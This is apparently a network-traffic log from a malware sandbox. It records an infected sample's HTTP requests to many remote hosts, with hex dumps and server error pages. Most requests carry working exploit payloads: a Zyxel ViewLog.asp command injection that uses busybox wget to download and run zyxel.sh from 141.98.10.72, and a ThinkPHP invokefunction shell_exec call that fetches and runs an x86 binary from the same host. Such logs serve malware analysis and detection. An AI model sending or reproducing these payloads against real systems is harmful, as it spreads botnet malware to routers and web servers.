                                                            Feb 14, 2024 09:29:55.550508022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.293987036 CET527INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:55 GMT
                                                            Server: Apache/2
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            870192.168.2.235256694.120.50.1338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.560887098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            871192.168.2.2352442112.166.253.25080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.647756100 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:55.931411982 CET487INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Sat, 25 Sep 2021 17:22:34 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            872192.168.2.235802231.200.35.78080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.806881905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            873192.168.2.235795094.120.240.1288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.810275078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            874192.168.2.233556894.121.59.678080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.810419083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            875192.168.2.235911894.123.18.288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.810566902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            876192.168.2.236025694.120.208.2018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.810698986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            877192.168.2.235520895.211.144.7980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.853223085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:56.061570883 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
                                                            Feb 14, 2024 09:29:56.061590910 CET1286INData Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                            Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
                                                            Feb 14, 2024 09:29:56.061609030 CET1286INData Raw: 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                            Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } foote
                                                            Feb 14, 2024 09:29:56.061626911 CET1286INData Raw: 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36
                                                            Data Ascii: float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                            Feb 14, 2024 09:29:56.061645031 CET1286INData Raw: 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66
                                                            Data Ascii: kl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt
                                                            Feb 14, 2024 09:29:56.061664104 CET1286INData Raw: 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52
                                                            Data Ascii: 2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5K
                                                            Feb 14, 2024 09:29:56.061683893 CET1122INData Raw: 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30
                                                            Data Ascii: IwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g
                                                            Feb 14, 2024 09:29:56.061738968 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to c4.suncomet.fi's <a href="mailto:server@suncomet.f
                                                            Feb 14, 2024 09:29:56.061754942 CET342INData Raw: 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 20 20
                                                            Data Ascii: nt=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel, In


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            878192.168.2.234164295.216.223.16080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.867899895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:56.088005066 CET406INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:55 GMT
                                                            Server: Apache/2
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            879192.168.2.233871494.46.181.638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.987406015 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.201457977 CET510INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                            Server: Apache
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 301 Moved Permanentlyerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            880192.168.2.234947285.195.85.708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:55.991517067 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
